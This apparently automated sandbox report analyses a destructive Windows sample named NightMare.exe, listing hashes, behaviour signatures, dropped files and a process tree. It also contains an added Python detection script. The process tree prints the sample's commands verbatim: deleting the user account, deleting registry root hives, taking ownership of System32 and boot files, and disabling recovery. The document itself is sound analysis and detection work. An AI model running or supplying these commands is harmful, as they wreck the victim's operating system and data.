Analysis

  • max time kernel
    150s
  • max time network
    115s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    02-03-2024 20:38

General

  • Target

    MyMalwareDatabase-main/MyMalwareDatabase-main/NightMare/NightMare.exe

  • Size

    42KB

  • MD5

    4c5dfe827dd3465bb97016996936fe38

  • SHA1

    010b868fe1a9e637912226a1eda1b73d901347dd

  • SHA256

    366373109445178df10e219c3d58ea40b435c3cc20f80be7398d199aee01f62b

  • SHA512

    e0692e425b7c702d297c88f0495c3bdae53eb566c3128f334d0e87e90a7047c433633f918ab6163a025a488111bcb2f199df0852b338fdc00e524897a2a7d82e

  • SSDEEP

    768:73oACIqXSoiSnWsHorfhH7HjVq9HTtYcFA/Vc6K:7TCxNn/orfhbDVqRD8Vcl

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Possible privilege escalation attempt 15 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 15 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 14 IoCs
  • Modifies File Icons 3 IoCs
  • Modifies registry class 40 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\MyMalwareDatabase-main\NightMare\NightMare.exe
    "C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\MyMalwareDatabase-main\NightMare\NightMare.exe"
    1⤵
    • UAC bypass
    • Disables RegEdit via registry modification
    • Checks computer location settings
    • Modifies system executable filetype association
    • Checks whether UAC is enabled
    • Drops file in Windows directory
    • Modifies Control Panel
    • Modifies File Icons
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:3928
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k net user %username% /delete && exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3768
      • C:\Windows\SysWOW64\net.exe
        net user Admin /delete
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3628
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user Admin /delete
          4⤵
          PID:1368
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k reg delete HKCR && exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2080
      • C:\Windows\SysWOW64\reg.exe
        reg delete HKCR
        3⤵
        PID:4764
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k reg delete HKU && exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4016
      • C:\Windows\SysWOW64\reg.exe
        reg delete HKU
        3⤵
        PID:3044
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k reg delete HKLM && exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2272
      • C:\Windows\SysWOW64\reg.exe
        reg delete HKLM
        3⤵
        • Modifies registry key
        PID:1488
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1736
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:5004
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k reagentc.exe /disable && pause
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3156
      • C:\Windows\SysWOW64\ReAgentc.exe
        reagentc.exe /disable
        3⤵
        • Drops file in System32 directory
        PID:4628
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k color 47 && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && Exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3668
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\System32
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1664
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\System32 /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:3640
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:8652
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:6984
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\taskmgr.exe && pause
      2⤵
      PID:7152
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\system32\taskmgr.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:6848
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\LogonUI.exe && pause
      2⤵
      PID:4236
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\system32\LogonUI.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4312
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\BCD && pause
      2⤵
      PID:8200
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI\BCD
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:3868
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi && pause
      2⤵
      PID:5172
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4364
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\drivers && pause
      2⤵
      PID:5400
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\system32\drivers
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:7296
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\servicing\TrustedInstaller.exe && pause
      2⤵
      PID:6260
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\servicing\TrustedInstaller.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:7300
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\System32\WUDFHost.exe && pause
      2⤵
      PID:7676
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\System32\WUDFHost.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:7736
    • C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM fontdrvhost.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:8260
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
      2⤵
      PID:1564
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:7020
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
      2⤵
      PID:8408
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:5220
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
      2⤵
      PID:7348
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:6428
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
      2⤵
      PID:5900
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F C:\Windows\Boot\DVD\EFI
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:7864
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:5048
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
    1⤵
    • Drops desktop.ini file(s)
    • Checks processor information in registry
    • Modifies registry class
    PID:2372
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    PID:8928
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
    1⤵
    PID:3784
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    PID:7060
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    PID:7524
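The Signatures list and the process tree above are what a detection engineer would turn into process-command-line rules: every destructive step (ownership takeover of C:\Windows paths, icacls full-control grants, deletion of registry root hives, deletion of the current user account, reagentc /disable, the forced kill of fontdrvhost.exe) is carried by a cmd.exe /k wrapper and its child tool, all parented by PID 3928. The following is an added example, not part of the sandbox report and not the sample author's code. It runs such rules over process-creation records of the shape a Sysmon Event ID 1 or sandbox export would give (field names are my assumption), aggregates hits per process tree by walking parent links, and scores a tree by the number of distinct techniques rather than raw match count, so the twenty near-identical takeown wrappers do not drown the signal. The event list is constructed from the report's tree: parent PIDs follow the nesting shown, and 0 marks a root whose parent the report does not show.

```python
"""Command-line rules for the destructive chain in the process tree above.

Added example, not part of the sandbox report and not the sample author's
code. Events are constructed from the report's process tree; parent PIDs
follow the tree's nesting, and 0 marks a root whose parent is not shown.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:  # shape of a Sysmon Event ID 1 / sandbox process record (assumed)
    pid: int
    ppid: int
    image: str
    cmdline: str


# Each pattern is applied to the lower-cased command line and is written for
# the exact commands the report shows; the hive alternation is the one extension.
RULES = [
    ("takeown_on_windows_dir",
     re.compile(r"\btakeown(\.exe)?\b.*\s/f\s+\"?c:\\windows\\")),
    ("icacls_full_grant_on_windows_dir",
     re.compile(r"\bicacls(\.exe)?\s+\"?c:\\windows\\.*\s/grant\s+\S+:f\b")),
    ("reg_delete_root_hive",
     re.compile(r"\breg(\.exe)?\s+delete\s+(hklm|hkcu|hkcr|hku|hkcc)(?![\\\w])")),
    ("net_user_delete",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+/delete\b")),
    ("reagentc_disable",
     re.compile(r"\breagentc(\.exe)?\s+/disable\b")),
    ("taskkill_force_fontdrvhost",
     re.compile(r"\btaskkill(\.exe)?\b(?=.*\s/f\b)(?=.*\s/im\s+fontdrvhost\.exe\b)")),
]

SYS = r"C:\Windows\SysWOW64"
ROOT = r"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\MyMalwareDatabase-main\NightMare\NightMare.exe"

# Constructed from the report's tree (a representative subset; PIDs as listed there).
EVENTS = [
    ProcEvent(3928, 0, ROOT, '"' + ROOT + '"'),
    ProcEvent(3768, 3928, SYS + r"\cmd.exe", r'"C:\Windows\System32\cmd.exe" /k net user %username% /delete && exit'),
    ProcEvent(3628, 3768, SYS + r"\net.exe", r"net user Admin /delete"),
    ProcEvent(1368, 3628, SYS + r"\net1.exe", r"C:\Windows\system32\net1 user Admin /delete"),
    ProcEvent(2080, 3928, SYS + r"\cmd.exe", r'"C:\Windows\System32\cmd.exe" /k reg delete HKCR && exit'),
    ProcEvent(4764, 2080, SYS + r"\reg.exe", r"reg delete HKCR"),
    ProcEvent(2272, 3928, SYS + r"\cmd.exe", r'"C:\Windows\System32\cmd.exe" /k reg delete HKLM && exit'),
    ProcEvent(1488, 2272, SYS + r"\reg.exe", r"reg delete HKLM"),
    ProcEvent(3156, 3928, SYS + r"\cmd.exe", r'"C:\Windows\System32\cmd.exe" /k reagentc.exe /disable && pause'),
    ProcEvent(4628, 3156, SYS + r"\ReAgentc.exe", r"reagentc.exe /disable"),
    ProcEvent(3668, 3928, SYS + r"\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /k color 47 && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F '
              r'&& takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && Exit'),
    ProcEvent(1664, 3668, SYS + r"\takeown.exe", r"takeown /f C:\Windows\System32"),
    ProcEvent(3640, 3668, SYS + r"\icacls.exe", r"icacls C:\Windows\System32 /grant Admin:F"),
    ProcEvent(7152, 3928, SYS + r"\cmd.exe", r'"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\taskmgr.exe && pause'),
    ProcEvent(6848, 7152, SYS + r"\takeown.exe", r"takeown /F C:\Windows\system32\taskmgr.exe"),
    ProcEvent(8260, 3928, SYS + r"\taskkill.exe", r'"C:\Windows\System32\taskkill.exe" /IM fontdrvhost.exe /F'),
    # Benign processes the sandbox also logged, kept as negative controls.
    ProcEvent(5048, 0, r"C:\Windows\system32\OpenWith.exe", r"C:\Windows\system32\OpenWith.exe -Embedding"),
    ProcEvent(2372, 0, r"C:\Windows\system32\svchost.exe",
              r"C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService"),
]


def root_ancestor(pid, by_pid):
    """Follow ppid links up to the first process whose parent is not in the set."""
    seen = set()
    while pid not in seen and pid in by_pid and by_pid[pid].ppid in by_pid:
        seen.add(pid)
        pid = by_pid[pid].ppid
    return pid


def scan(events):
    """Return {root_pid: {rule_name: [matching pids]}} aggregated per process tree.

    A cmd.exe wrapper and the tool it launches both match; that is deliberate,
    so the rule still fires on the wrapper if the child never starts.
    """
    by_pid = {e.pid: e for e in events}
    findings = defaultdict(lambda: defaultdict(list))
    for e in events:
        cmd = e.cmdline.lower()
        for name, rx in RULES:
            if rx.search(cmd):
                findings[root_ancestor(e.pid, by_pid)][name].append(e.pid)
    return {root: dict(rules) for root, rules in findings.items()}


def verdict(rules_hit, threshold=3):
    """Score a tree by distinct destructive techniques, not by raw match count."""
    if len(rules_hit) >= threshold:
        return "destructive"
    return "suspicious" if rules_hit else "clean"


if __name__ == "__main__":
    for root, rules in scan(EVENTS).items():
        print(root, verdict(rules), sorted(rules))
```

On the constructed events the only root with findings is 3928, and all six rules fire under it; the OpenWith.exe and svchost.exe roots produce nothing. The per-root aggregation matters in practice because each wrapper is a separate cmd.exe: a rule that alerts per process would raise dozens of identical takeown alerts, while counting distinct techniques per tree gives one "destructive" verdict for the sample.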

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE.txt

    Filesize

    662B

    MD5

    21ad42bd4156f914d3a265823a1c269c

    SHA1

    4129bc994a0947b38e3bac2aeabc8e2fbdbd503f

    SHA256

    680671bac3f22a5f19ffbd2c82eec069a32844cf93d419aa59319cd0cbc98ac2

    SHA512

    7ec8c3801798b4fd547578d31badd96edeaacf0a91dca807c04e40ad65d97592043cb8e747947f74b9850f8e99dcd1c8f1c311cb0f8b79be301be36ca884cc5a

  • C:\Users\Admin\Videos\Captures\desktop.ini

    Filesize

    190B

    MD5

    b0d27eaec71f1cd73b015f5ceeb15f9d

    SHA1

    62264f8b5c2f5034a1e4143df6e8c787165fbc2f

    SHA256

    86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2

    SHA512

    7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

  • memory/3928-0-0x0000000000080000-0x0000000000090000-memory.dmp

    Filesize

    64KB

  • memory/3928-1-0x0000000075000000-0x00000000757B0000-memory.dmp

    Filesize

    7.7MB

  • memory/3928-2-0x0000000005130000-0x00000000056D4000-memory.dmp

    Filesize

    5.6MB

  • memory/3928-3-0x0000000004A90000-0x0000000004B22000-memory.dmp

    Filesize

    584KB

  • memory/3928-4-0x0000000004CE0000-0x0000000004CF0000-memory.dmp

    Filesize

    64KB

  • memory/3928-5-0x0000000004A80000-0x0000000004A8A000-memory.dmp

    Filesize

    40KB

  • memory/3928-12131-0x0000000075000000-0x00000000757B0000-memory.dmp

    Filesize

    7.7MB

  • memory/3928-15840-0x0000000004CE0000-0x0000000004CF0000-memory.dmp

    Filesize

    64KB

  • memory/3928-120019-0x0000000004CE0000-0x0000000004CF0000-memory.dmp

    Filesize

    64KB

  • memory/3928-120041-0x0000000004CE0000-0x0000000004CF0000-memory.dmp

    Filesize

    64KB